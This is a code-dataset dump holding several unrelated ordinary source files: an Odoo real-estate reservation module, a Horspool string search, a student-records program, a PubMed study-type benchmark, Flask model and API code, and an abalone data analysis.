maintaince_journal_obj.under_collected_account_id:\r\n raise ValidationError(_(\"Please set undercollection account in maintaince journal from configuration.\"))\r\n for pay in rec.payment_strg_ids:\r\n if not pay.journal_id.default_credit_account_id or not pay.journal_id.default_debit_account_id:\r\n raise ValidationError(\r\n _('Please define default credit/debit accounts on the journal \"%s\".') % (rec.journal_id.name))\r\n if pay.deposite == False:\r\n pay.write({'cheque_status': 'under_collection',\r\n 'under_collected_journal_entry_id': under_collection_move_obj.id})\r\n if float_compare(pay.maintainance_fees, 0.0, 6) in [1]:\r\n maintaince = True\r\n maintaince_credit_amount += pay.maintainance_fees\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': maintaince_journal_obj.under_collected_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': 'under collection maintaince',\r\n 'debit': pay.maintainance_fees,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0})\r\n debit_amount = pay.amount - pay.maintainance_fees\r\n elif pay.add_extension:\r\n maintaince = True\r\n maintaince_credit_amount += pay.amount\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': maintaince_journal_obj.under_collected_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': 
pay.project_id.id,\r\n 'name': 'under collection maintaince',\r\n 'debit': pay.amount,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0})\r\n debit_amount = pay.amount - pay.amount\r\n else:\r\n debit_amount = pay.amount\r\n\r\n credit_amount += debit_amount\r\n if debit_amount != 0.0:\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': pay.journal_id.under_collected_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': pay.description,\r\n 'debit': debit_amount,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0\r\n })\r\n\r\n if maintaince and maintaince_credit_amount != 0.0:\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': maintaince_journal_obj.default_credit_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'under collection maintaince',\r\n 'credit': maintaince_credit_amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0})\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': pay.journal_id.default_credit_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'Under Collection ',\r\n 'credit': credit_amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0,\r\n\r\n })\r\n under_collection_move_obj.journal_id = under_collection_journal_obj.id\r\n under_collection_move_obj.post()\r\n rec.write({'state': 'under_collection', 'undercollection_check': True,\r\n 'under_collection__journal_entry_id': under_collection_move_obj.id})\r\n\r\n @api.multi\r\n def button_review(self):\r\n for rec in self:\r\n if (float_compare(rec.discount, 0.0, 6) in [1]) and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not any(attach.legal_type == 'legal2' for attach in rec.attach_ids):\r\n raise ValidationError(_(\"You should Select Legal Attachment 2 Type.\"))\r\n for attach in rec.attach_ids:\r\n if attach.legal_type == 'legal2' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Legal 2' file that has size.\"))\r\n return rec.write({'state': 'review', 'review_user_id': self.env.user.id, 'reviewed_check': True})\r\n\r\n @api.multi\r\n def button_in_progress(self):\r\n for rec in self:\r\n user = self.env['res.users'].browse(self.env.uid)\r\n\r\n # Check if properties in reservation request are still available or not\r\n if (any(True for each_unit in rec.unit_ids if each_unit.status != 'available')):\r\n raise ValidationError(_(\"One or more of selected properties are not available\"))\r\n\r\n if rec.discount and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not rec.customer_id:\r\n raise ValidationError(_('You 
Must Choose Customer'))\r\n if not rec.pay_strategy_id:\r\n raise ValidationError(_('You Must Choose Payment Strategy'))\r\n\r\n if rec.payment_strg_ids:\r\n for pay in rec.payment_strg_ids:\r\n if pay.deposite == True:\r\n if not pay.move_id:\r\n raise ValidationError(_('All Deposits Amount Must Be Paid'))\r\n\r\n if not rec.payment_attach_ids:\r\n raise ValidationError(_(\"You should attach Deposit Papers.\"))\r\n if rec.payment_attach_ids:\r\n if not any(attach.attach_type == 'deposit' for attach in rec.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type deposit.\"))\r\n if not any(attach.attach_type == 'signature' for attach in rec.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type signature.\"))\r\n for attach in rec.payment_attach_ids:\r\n if attach.attach_type == 'deposit' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Deposit' file that has size.\"))\r\n\r\n for unit in rec.unit_ids:\r\n unit.write({'status': 'reserved'})\r\n rec.sudo().write({'state': 'in_progress',\r\n 'reservation_date': datetime.date.today(),\r\n 'in_progress_user_id': self.env.user.id})\r\n if user.has_group('isky_access_rights.group_ar'):\r\n return {\r\n 'view_type': 'form',\r\n 'view_mode': 'tree',\r\n 'res_model': 'rs.reservation',\r\n 'type': 'ir.actions.act_window',\r\n 'target': 'current',\r\n 'res_id': rec.id,\r\n }\r\n\r\n @api.multi\r\n def cancel(self):\r\n for rec in self:\r\n if not rec.approve_cancellation:\r\n raise ValidationError(_('Manager Must Approve Cancellation'))\r\n if not rec.payment_attach_ids:\r\n raise ValidationError(_(\"You should attach Cancellation papers.\"))\r\n if rec.payment_attach_ids:\r\n if not any(attach.attach_type == 'cancel' for attach in rec.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type cancel.\"))\r\n for attach in rec.payment_attach_ids:\r\n if attach.attach_type == 'cancel' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Cancel' file that has size.\"))\r\n\r\n if not rec.customer_id:\r\n raise ValidationError(_('You Must Choose Customer'))\r\n\r\n for unit in rec.unit_ids:\r\n unit.write({'status': 'available'})\r\n rec.write({'state': 'cancel', 'cancelled': True, 'cancel_user_id': rec.env.user.id})\r\n for inv in rec.account_invoice_ids:\r\n if inv.state not in ('draft', 'cancel'):\r\n raise ValidationError(\r\n _('Cannot cancel this sales order!'),\r\n _('First cancel all invoices attached to this sales order.'))\r\n inv.signal_workflow('invoice_cancel')\r\n\r\n rec.sale_order_id.write({'state': 'cancel'})\r\n\r\n @api.constrains('created_date', 'expire_date')\r\n def _check_created_date(self):\r\n for obj in self:\r\n if obj.expire_date and obj.created_date and obj.expire_date <= obj.created_date:\r\n raise ValidationError(_('Expire Date Must be greater Than Creation Date'))\r\n\r\n @api.multi\r\n @api.onchange('project_id')\r\n def on_change_project(self):\r\n for rec in self:\r\n # rec.unit_ids = False\r\n all_phases = []\r\n if rec.phase_id.project_id.id != rec.project_id.id:\r\n rec.phase_id = False\r\n phases = self.env['project.phase'].search(\r\n [('project_id', '=', rec.project_id.id), ('available', '=', True)])\r\n for phase in phases:\r\n all_phases.append(phase.id)\r\n return {'domain': {'phase_id': [('id', 'in', all_phases)]}}\r\n\r\n @api.multi\r\n @api.onchange('phase_id')\r\n def on_change_phase(self):\r\n for rec in self:\r\n\r\n all_properties = []\r\n properties = 
self.env['product.product'].search([('project_id', '=', rec.project_id.id),\r\n ('phase_id', '=', rec.phase_id.id),\r\n ('type', '=', 'property'),\r\n ('status', 'in', ['available'])])\r\n\r\n not_avail_prop = self.env['product.product'].search([('project_id', '=', rec.project_id.id),\r\n ('phase_id', '=', rec.phase_id.id),\r\n ('type', '=', 'property'),\r\n ('resp_user_id', '=', self.env.uid),\r\n ('status', 'in', ['not_available'])]).ids\r\n\r\n for property in properties:\r\n all_properties.append(property.id)\r\n\r\n if not_avail_prop:\r\n all_properties += not_avail_prop\r\n rec.unit_ids = rec.unit_ids if rec.unit_ids and len(rec.unit_ids) == 1 and rec.unit_ids.ids[\r\n 0] in all_properties else False\r\n return {'domain': {'unit_ids': [('id', 'in', all_properties)]}}\r\n\r\n @api.multi\r\n def action_paid_broker_amount(self):\r\n for rec in self:\r\n if not rec.broker_ids:\r\n raise ValidationError(_('There is no Brokers'))\r\n if rec.state == 'draft':\r\n raise ValidationError(_('You Can not create invoice , Reservation state is draft'))\r\n if rec.state == 'cancel':\r\n raise ValidationError(_('You Can not create invoice , Reservation state is cancelled'))\r\n if rec.state not in ['draft', 'cancel']:\r\n account_invoice_obj = rec.env['account.invoice']\r\n for broker in rec.broker_ids:\r\n if not broker.broker_commission_amount:\r\n raise ValidationError(\r\n _('You Must Enter Commission percentage for this broker \"%s\" ') % (broker.name))\r\n if not broker.broker_commission_account:\r\n raise ValidationError(\r\n _('You Must Enter Commission account for this broker \"%s\" ') % (broker.name))\r\n\r\n if broker.broker_commission_account:\r\n account_invoice_obj.create({'partner_id': broker.id,\r\n 'company_id': self.env.user.company_id.id,\r\n 'property_account_payable_id': broker.broker_commission_account.id or False,\r\n 'reserve_id': rec.id,\r\n 'type': 'in_invoice',\r\n 'invoice_line_ids': [(0, 0, {\r\n 'name': 'Broker Commission',\r\n 'account_id': broker.broker_commission_account.id,\r\n 'price_unit': (rec.net_price * broker.broker_commission_amount)\r\n / 100.0,\r\n })]\r\n })\r\n else:\r\n raise ValidationError(_(\"You Must Enter Commission Account.\"))\r\n rec.write({'button_broker_paid': True})\r\n return True\r\n\r\n @api.multi\r\n def print_payment_report(self):\r\n data = {}\r\n data['form'] = \\\r\n self.read(['name', 'reservation_code', 'project_id', 'phase_id', 'unit_ids', 'pay_strategy_id'])[0]\r\n data['ids'] = self.id\r\n return self.env['report'].get_action(self, 'sky_height.reservation_payment_report_template', data=data)\r\n\r\n @api.constrains('payment_strg_ids')\r\n def _check_payment_strg_ids(self):\r\n self._check_total_payment_amount()\r\n\r\n @api.multi\r\n @api.depends('net_price', 'payment_strg_ids', 'pay_strategy_id')\r\n def _check_total_payment_amount(self):\r\n for rec in self:\r\n total_amount = 0.0\r\n maintaince_amount = 0.0\r\n for payment_obj in rec.payment_strg_ids:\r\n if float_compare(payment_obj.maintainance_fees, 0.0, 6) in [1]:\r\n if float_compare(payment_obj.maintainance_fees, payment_obj.amount, 6) in [1]:\r\n raise ValidationError(_(\"Maintenance fees can not be greater than cheque amount!!\"))\r\n if payment_obj.old_value == 0.0:\r\n payment_obj.old_value = payment_obj.amount\r\n payment_obj.amount += payment_obj.maintainance_fees\r\n total_amount += payment_obj.old_value\r\n\r\n elif payment_obj.add_extension:\r\n maintaince_amount += payment_obj.amount\r\n else:\r\n total_amount += round(payment_obj.amount, 6)\r\n if 
float_compare(round(total_amount), round(rec.net_price), 6) in [1, -1]:\r\n raise ValidationError(_('Total Amount of Payments Must Be Equal Net Price \"%s\". ') % rec.net_price)\r\n\r\n\r\nclass PDCStatus(models.Model):\r\n _name = 'pds.status'\r\n\r\n name = fields.Char(\"Name\", required=True)\r\n\r\n\r\nclass IrAttachment(models.Model):\r\n _inherit = 'ir.attachment'\r\n\r\n reserve_id = fields.Many2one('rs.reservation', string='Reservation')\r\n cancel_reserve_id = fields.Many2one('rs.reservation', string='Cancel Reservation')\r\n cancel_sale_reserve_id = fields.Many2one('sale.order', string='Cancel Reservation')\r\n legal_type = fields.Selection([('legal1', 'Legal Attachment 1'), ('legal2', 'Legal Attachment 2')], string='Type')\r\n\r\n attach_type = fields.Selection([('deposit', _(\"Deposit\")),\r\n ('checks', _(\"Checks\")),\r\n ('signature', _(\"Signature\")),\r\n ('cancel', _(\"Cancellation\")), ], _('Type'))\r\n","repo_name":"ahmedyousssssef/odoo","sub_path":"openerp/addons/sky_height/models/real_estate_reservation.py","file_name":"real_estate_reservation.py","file_ext":"py","file_size_in_byte":69245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5657281210","text":"import sys\r\nimport string\r\n\r\nclass color:\r\n GREEN = '\\033[92m'\r\n RED = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n\r\ndef printprocess(shift):\r\n print(text)\r\n for i in range(0, shift):\r\n print(\" \", end = \"\")\r\n print(pattern)\r\n\r\ndef preprocess(pattern):\r\n occ = dict.fromkeys(string.ascii_lowercase, -1)\r\n \r\n for i in range(0,len(pattern)-1):\r\n occ[pattern[i]] = i\r\n\r\n return occ\r\n\r\ndef search(text,pattern,occ):\r\n found = 0\r\n i = 0\r\n m = len(pattern)\r\n n = len(text)\r\n\r\n while i <= n - m:\r\n printprocess(i)\r\n \r\n j = m - 1\r\n\r\n while j >= 0 and pattern[j] == text[i + j]:\r\n j = j - 1\r\n\r\n if j < 0:\r\n found = found + 1\r\n print(f\"{color.GREEN}Found!{color.ENDC}\")\r\n\r\n i = i + m-1\r\n i = i - occ[text[i]]\r\n\r\n return found\r\n\r\ntext=\"\"\r\npattern=\"\"\r\n\r\nwhile len(text) <= 0:\r\n text = input(\"Text: \")\r\n\r\nwhile len(pattern) <= 0:\r\n pattern = input(\"Pattern: \")\r\n\r\nocc = preprocess(pattern)\r\n\r\nfound = search(text,pattern,occ)\r\n\r\nprint(f\"{color.RED}Found\", found, f\"match(es){color.ENDC}\")","repo_name":"FjolleI/boyer-moore-horspool","sub_path":"horspool.py","file_name":"horspool.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71019907682","text":"def studentDataProgram():\n profile = dict()\n\n while 1:\n selectNum = input(\"1.학생 저장하기\\n2. 학생 조회하기\\n0. 
종료\\n\")\n # 원래 코드 보면 a라고 변수이름을 지정했던데 변수이름은 for문에 들어가는 i를 제외하고는\n # 항상 의미가 담긴 이름을 지어야 나중에 코드 볼때 안 헷갈림\n\n if selectNum == '1':\n name = input(\"학생의 이름을 적어주세요\\n\")\n age = input(\"학생의 나이를 적어주세요\\n\")\n kg = input(\"학생의 몸무게를 적어주세요\\n\")\n\n profile[name] = [age, kg]\n # 이름을 key로 사용해서 배열로 나이와 키를 저장함\n\n if selectNum == '2':\n findname = input('학생의 이름을 입력하세요\\n')\n\n if findname in profile: # 해당 key가 딕셔너리에 있는지를 확인하는 in 함수\n print(\"학생의 나이는 \" + profile[findname][0] + \"세 입니다.\")\n print(\"학생의 몸무게는 \" + profile[findname][1] + \"kg 입니다.\\n\")\n # 파이썬은 개꿀언어라 굳이 %s이런식으로 사용안하고 위 코드처럼 날로먹어도 됨\n\n if findname not in profile:\n print(\"존재하지 않는 학생입니다\")\n # 코딩테스트에서는 상관없긴하지만 else 문법은 아예 사용안하는걸 습관화 하는게 좋음\n # else를 사용하면 코드를 보고 직관적으로 어떤 경우에 해당 기능을 실행하는지 헷갈리기 떄문\n if selectNum != '1' and selectNum != '2':\n print(\"잘못된 메뉴선택입니다\")\n\n if selectNum == '0':\n # 함수 종료는 항상 return으로\n return\n\nstudentDataProgram()\n# 추가로 띄어쓰기나 줄바꿈 깔끔하게 코드 작성하는것도 습관화 해놔야 나중에 가독성이 좋아서 안헷갈림\n# 코드도 글쓴다고 생각하고 의미가 좀 변하거나, if 문 사이는 항상 한칸씩 띄워서 연습하면 좋음","repo_name":"leeminjae-dev/Coding_Test","sub_path":"df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19404389023","text":"# Libraries\r\nimport pandas as pd\r\nfrom pymed import PubMed\r\nfrom Library.Recognizer import ROOT_DIR\r\n\r\n\r\ndef paper_search(pmid):\r\n pubmed = PubMed(tool='name_of_the_database', email='simonecensuales1998@gmail.com')\r\n results = pubmed.query(pmid, max_results=1)\r\n article_list = []\r\n article_info = []\r\n\r\n for article in results:\r\n # Print the type of object we've found (can be either PubMedBookArticle or PubMedArticle).\r\n # We need to convert it to dictionary with available function\r\n article_dict = article.toDict()\r\n article_list.append(article_dict)\r\n\r\n if len(article_list) != 0:\r\n # Generate list of dict records which will hold all article details that could be fetch from PUBMED API\r\n for article in article_list:\r\n # Sometimes article['pubmed_id'] contains list separated with comma - take first pubmedId in that list -\r\n # thats article pubmedId\r\n pubmed_id = article['pubmed_id'].partition('\\n')[0]\r\n # Append article info to dictionary\r\n try:\r\n article_info.append({u'pmid': pmid,\r\n u'pubmed_id': pubmed_id,\r\n u'title': article['title'],\r\n u'keywords': article['keywords'],\r\n u'journal': article['journal'],\r\n u'abstract': article['abstract'],\r\n u'conclusions': article['conclusions'],\r\n u'results': article['results']})\r\n except (Exception,):\r\n continue\r\n else:\r\n # Append article info to dictionary\r\n article_info.append({u'pmid': \"\",\r\n u'pubmed_id': \"\",\r\n u'title': \"\",\r\n u'keywords': \"\",\r\n u'journal': \"\",\r\n u'abstract': \"\",\r\n u'conclusions': \"\",\r\n u'results': \"\"})\r\n df = pd.DataFrame(article_info)\r\n return df\r\n\r\n\r\ndef build_database_onlyname(df):\r\n paper_documented = []\r\n for i in range(len(df)):\r\n paper_documented.append(\r\n [df.iloc[i][\"pmid\"]])\r\n return paper_documented\r\n\r\n\r\ndef search_all_paper():\r\n df = pd.read_csv(r\"\" + ROOT_DIR + '/Sources/benchmark_studytype.csv', sep=\";\")\r\n papers_pmid = build_database_onlyname(df)\r\n articles_pd = pd.DataFrame()\r\n for PMID in papers_pmid:\r\n article_df = paper_search(PMID)\r\n if article_df.iloc[0][\"pmid\"] != \"\":\r\n articles_pd = pd.concat([articles_pd, article_df])\r\n articles_pd.to_csv(r\"\" + ROOT_DIR + '/Sources/benchmark_studytypefinal.csv', 
index=False, header=True)\r\n\r\n\r\n# search_all_paper()\r\n\r\ndef meta_paper_creator(df):\r\n mega_string = \"\"\r\n str1 = str(df['title'])\r\n if str1 is None:\r\n str1 = \"\"\r\n str2 = str(df['abstract'])\r\n if str2 is None:\r\n str2 = \"\"\r\n str3 = \"\"\r\n for keyword in df['keywords']:\r\n if keyword is not None:\r\n str3 = str3 + str(keyword) + \" \"\r\n str4 = str(df['journal'])\r\n if str4 is None:\r\n str4 = \"\"\r\n str5 = str(df['conclusions'])\r\n if str5 is None:\r\n str5 = \"\"\r\n str6 = str(df['results'])\r\n if str6 is None:\r\n str6 = \"\"\r\n mega_string = mega_string + str1 + str2 + str3 + str4 + str5 + str6\r\n return mega_string\r\n\r\n\r\ndef search_keyword(mega_string):\r\n if len(mega_string) < 1:\r\n return 0\r\n points = []\r\n with open(ROOT_DIR + '/Sources/Studies/CaseControl.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(4)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/CaseSeries.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(2)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/CohortStudy.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(5)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/MetaAnalysis.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(7)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/ObservationalStudy.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(3)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/Other.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(1)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/RCT.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(6)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/SystematicReview.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(7)\r\n break\r\n return points\r\n\r\n\r\ndef benchmark_studytype():\r\n df = pd.read_csv(r\"\" + ROOT_DIR + '/Sources/benchmark_studytypefinal.csv', sep=\",\")\r\n df2 = pd.read_csv(r\"\" + ROOT_DIR + '/Sources/benchmark_studytype.csv', sep=\";\")\r\n CC = 0 #correctly classified\r\n INCDIFF=0 #incremental score's differences\r\n for i in range(len(df)):\r\n mega_string = meta_paper_creator(df.iloc[i, :])\r\n points = search_keyword(mega_string)\r\n score = max(points, key=points.count)\r\n score2= df2.iloc[i][\"Score\"]\r\n INCDIFF += abs(score-score2)\r\n if score == df2.iloc[i][\"Score\"]:\r\n CC +=1\r\n accuracy = CC / len(df)\r\n MAE=((INCDIFF)/len(df))/7\r\n print(\"accuracy: \", round(accuracy * 100, 1), \"%\")\r\n print(\"MAE: \", round(MAE * 100, 1), \"%\")\r\n\r\n\r\nbenchmark_studytype()","repo_name":"Censu08/e-HealthProject","sub_path":"Library/Benchmark/Benchmark_StudyType.py","file_name":"Benchmark_StudyType.py","file_ext":"py","file_size_in_byte":6318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4597926930","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask_app import DATABASE_NAME\n#from flask_app.models.ninja import Ninja\nfrom flask import flash\nimport re\t# the regex 
module\n# create a regular expression object that we'll use later \nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$') \n\nclass Student:\n def __init__(self, data_dict):\n self.id = data_dict['id']\n self.name = data_dict['name']\n self.language = data_dict['language']\n self.location = data_dict['location']\n self.comments = data_dict['comments']\n self.created_at = data_dict['created_at']\n self.updated_at = data_dict['updated_at']\n\n @classmethod\n def create(cls,data_dict):\n query= \"\"\"INSERT INTO students (name,language,location,comments) VALUES \n (%(name)s,%(language)s,%(location)s,%(comments)s);\n \"\"\"\n return connectToMySQL(DATABASE_NAME).query_db(query,data_dict)\n \n @classmethod\n def get_student_by_id(cls,data_dict):\n # query = \"\"\"SELECT id,first_name, last_name,email, created_at, DATE_FORMAT(updated_at, '%M %e, %Y %h:%i %p') as updated_at \n # FROM users WHERE id=%(id)s;\"\"\"\n query = \"\"\"SELECT * FROM students WHERE id=%(id)s;\"\"\"\n result = connectToMySQL(DATABASE_NAME).query_db(query,data_dict)\n if result:\n the_user = cls(result[0])\n return the_user\n return False\n\n @staticmethod\n def validation(data_dict):\n is_valid=True\n if len(data_dict['name'])<2:\n is_valid = False\n flash(\"name is required\", \"name\")\n if not data_dict['location']:\n is_valid = False\n flash(\"location is required\", \"location\")\n if not data_dict['language']:\n is_valid = False\n flash(\"language is required\", \"language\")\n if len(data_dict['comments'])<1:\n is_valid = False\n flash(\"comment is required\", \"comments\")\n \n return is_valid\n \n \n # @classmethod\n # def get_all(cls):\n # query = \"\"\" SELECT * FROM users; \"\"\"\n \n # result = connectToMySQL(DATABASE_NAME).query_db(query)\n # all_users= []\n # for row in result:\n # user = cls(row)\n # all_users.append(user)\n # return all_users","repo_name":"MedAmineBenMakhlouf/Python","sub_path":"05-flask_mysql/Practice/Dojo_survey_Validation/flask_app/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12510822932","text":"class Solution(object):\n def possibleBipartition(self, N, dislikes):\n \"\"\"\n :type N: int\n :type dislikes: List[List[int]]\n :rtype: bool\n \"\"\"\n table = {}\n for a,b in dislikes:\n table.setdefault(a,[]).append(b)\n table.setdefault(b,[]).append(a)\n color = [-1]*(N+1)\n \n def dfs(i, c):\n if color[i]==-1:\n color[i] = c\n else:\n if color[i]!=c:\n return False\n else:\n return True\n for k in table.get(i,[]):\n if not dfs(k, 1-c):\n return False\n return True\n for i in xrange(1, N+1):\n if color[i]==-1 and not dfs(i, 0):\n return False\n return True\n ","repo_name":"nyroro/leetcode","sub_path":"LC922.py","file_name":"LC922.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25679575226","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nimport numpy as np\n\ndata = pd.read_csv(\"data.csv\", header=None)\nindex = [\"Length\", \"Diameter\", \"Height\", \"WholeWeight\", \"ShuckedWeight\", \"VisceraWeight\", \"ShellWeight\", \"Rings\"]\nindexp = [\"Sex\", \"Length\", \"Diameter\", \"Height\", \"WholeWeight\", \"ShuckedWeight\", \"VisceraWeight\", \"ShellWeight\",\n \"Rings\"]\n# 3.1\n\ncountOfEachGender = data[0].value_counts()\npercentageOfEachGender = 
data[0].value_counts(normalize=True) * 100\ntableData = {'count': countOfEachGender.values.tolist(), '%': percentageOfEachGender.values.tolist()}\ntable1 = pd.DataFrame(tableData, index=[\"Male\", \"Infant\", \"Female\"])\n# print(table1)\n\n# 3.2\n\ntable2 = data.describe().T.drop(['count'], axis=1)\ntable2.set_axis(index, axis=0, inplace=True)\n# print(table2)\n\n# 3.3\n\n# plt.bar([\"Male\", \"Infant\", \"Female\"], countOfEachGender, width=0.35)\n# plt.title(\"Liczebność poszczególnych płci\")\n# plt.show()\n\n# 3.4\n\n# fig, axes = plt.subplots(4, 2, figsize=(8, 7))\n# axes = axes.ravel()\n# for idx, ax in enumerate(axes):\n# ax.hist(data[:][idx + 1], 15, edgecolor=\"black\")\n# ax.set_title(index[idx])\n# plt.show()\n\n# 4.2\n\n# i = 1\n# j = 2\n# fig, axes = plt.subplots(14, 2, figsize=(7, 25))\n# axes = axes.ravel()\n# for idx, ax in enumerate(axes):\n# ax.scatter(data[:][i], data[:][j], s=5)\n# ax.set_xlabel(index[i-1])\n# ax.set_ylabel(index[j-1])\n# print(i, j)\n# if j == 8:\n# i += 1\n# j = i\n# if j < 8:\n# j += 1\n# else:\n# j = 1\n# plt.show()\n\n# 4.3\n\n# tableCorrelation = data.drop([0], axis=1).corr()\n# tableCorrelation.set_axis(index, axis=0, inplace=True)\n# tableCorrelation.set_axis(index, axis=1, inplace=True)\n# print(tableCorrelation.to_string())\n\n# 4.4\n\n# fig, ax = plt.subplots(figsize=(15, 5))\n# sb.heatmap(tableCorrelation, cmap=\"Blues\", linewidths=0.5)\n# ax.xaxis.tick_top()\n# plt.xticks(np.arange(8) + .5, labels=index)\n# plt.show()\n\n# 4.5\n\n# specificData = data[[1, 2]]\n# specificData.columns = [\"Length\", \"Diameter\"]\n# sb.regplot(x=\"Length\", y=\"Diameter\", data=specificData,\n# scatter_kws={'s': 10, 'alpha': 0.5})\n# plt.show()\n\n# 5.2\n\ndata.columns = indexp\ntable4 = data.groupby('Sex').describe().stack().T.stack(0)\ntable4 = table4.rename_axis([\"Feature\", \"Sex\"], axis=0)\n# print(table4)\n\n# 5.3\n\ntable5 = data.groupby('Sex')\nfemale = table5.get_group(\"F\")\ninfant = table5.get_group(\"I\")\nmale = table5.get_group(\"M\")\n\nfig, axes = plt.subplots(4, 2, figsize=(10, 20))\naxes = axes.ravel()\nfor idx, ax in enumerate(axes):\n ax.boxplot([female.iloc[:, idx+1], infant.iloc[:, idx+1], male.iloc[:, idx+1]])\n ax.set_xticklabels([\"Female\", \"Infant\", \"Male\"])\n ax.set_title(index[idx])\nplt.show()\n\n\n","repo_name":"geloStudy/SnailAnalysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16092119458","text":"# For queries and response\nfrom db_setup import Session\nfrom app.models import Indicators\nfrom flask import render_template\nfrom flask import Flask, request, jsonify\n\n# Routing application\napplication = Flask(__name__, template_folder='../templates')\n\n@application.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\"\"\"\n Returns a list of all countries with no filter\n --------------------------------------\n Parameters:\n None so far\n\"\"\"\n@application.route('/countries/all', methods=['GET'])\ndef countries_all():\n session = Session()\n # Query on the database getting all the results\n countries = session.query(Indicators.location, Indicators.country).all()\n return jsonify(countries)\n\n\"\"\"\n Returns a list of countries filtering by:\n INDICATOR: SW_LIFS (Life satisfaction)\n INEQUALITY: TOT (Total)\n VALUE: greater than the input index\n --------------------------------------\n Parameters:\n index: min threshold for 
